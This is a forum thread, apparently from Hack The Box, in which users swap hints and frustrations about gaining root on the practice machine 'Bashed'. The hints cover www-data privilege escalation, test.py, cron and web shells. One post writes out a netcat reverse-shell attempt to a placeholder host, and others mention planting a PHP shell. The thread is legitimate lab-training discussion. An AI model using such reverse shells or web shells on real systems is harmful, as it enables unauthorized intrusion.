Bashed

Comments

• I have the best one: Enum and try harder.

• So that was it, just a pair of bigger glasses to get root
  • @Saoirse said:
    It's like watching an AngryJoeShow video review :D

I'd love to have access to a sub-forum for each box, password protected by the root flag, then we could discuss why certain things wouldn't work that under different circumstances would of, it's just a thought..

This is an awesome idea!! Would love to see it implemented if possible!!

andrewh

• Surprised at how long it took to get root; mainly due to poor attention to detail.

That said, it was not as straight forward as the ratings would suggest. Expect a number of distinct actions and pay close attention to the details of important files/directories.

Enjoy!

CISSP | OSCP | OSCE

• i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

lordsoahc
    CCNP, CCNAx3

• There is a way of reading the file you need... without being root

Hack The Box

• There's probably a better way though... really you should become root

Hack The Box

• It's been 2 days and still no luck with priv esc.
    Someone please drop a little hint besides enumeration

• Ok i see the scripts directory. Have used the linenum.sh script. I have tried /bin/sh -i | nc x.x.x.x wich failed.dont seem to be a way to get python to spawn a shell. cant change /etc/profile as i am not root. Can u give a next hint to get out of jailed shell?

lordsoahc
    CCNP, CCNAx3

• pm Me

lordsoahc
    CCNP, CCNAx3

• ls "minus" l "slash" ..enough said

deltaclock

• Enough !
    I'm leaving this box.

• Finally I'm very close to getting root !
    I just wanted to ask how did you guys execute the file before getting root cause i'm getting a permission denied message

• @lordsoahc said:
    i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

Stuck in the same position.Tried "python" too. no clue how to proceed

FloptimusCrime

• I just got the flag for root, and this box drove me crazy!

Magavolt

• Guys, i'm very noob to hacking and even more in web hack, if someone could give me some tips I will appreciate XD.
    I already enumerate de directories, didn't find nothing interesting
    I try some way to put a php on site to create my way in bit nothing works.
    the only php on site have nothing inside and I couldn't exploit it

Could you guys help me?

• Same here. I don't know how to proceed after reading test.py. Anyone can give me a consistent hint (or even explain the next step) in PM?
    Trying is important to learn, getting stuck forever is only frustrating and I don't learn.
    Thanks in advance.

halfluke

• nevermind I got root

halfluke

• hi, i managed to get user.txt. currently, i have a php shell script in the tmp folder but trying to move it to the var folder to no avail. any help would be appreciated! thanks!

• I keep struggling to get priv escalation from php since. Can anyone share a hint through PM
  • i also have stuck on priv esc. - runnning test.py it says 'permission denied. i tried bunch of sudo using scriptmanager or root - everytime it asks the password for current user. it is dead end. i saw somebody might used cron vector, but previous post siad what i even dont need rev shell to read root.txt. please, help because i couldn find another sudo options after lot of surfing the net which could work.

• edited March 2018

Spoiler Removed - Arrexel

halfluke

• edited March 2018

@halfluke said:

In fact you can see it but you have to be focus on time...

1nitiative

• you can actually see once you get a root shell

halfluke

• Hello, I am new here and I was looking for a bit of guidance, have run my enums and noticed some things, just wanted to know if I could pm someone and make sure im headed in the right direction. Thank you.

• can anyone guide me to escalate privilege, tried with linuxprivchecker.py but still missing something. Thank you

• Enumerate more. Maybe try another script to enumerate linux machines.

• edited March 2018

• Am I the only one not able to use the upload command????

• @RedCup0x0 said:
    Am I the only one not able to use the upload command????

there alternatives to upload command (hint: run some service on your local machine)

Sign In to comment.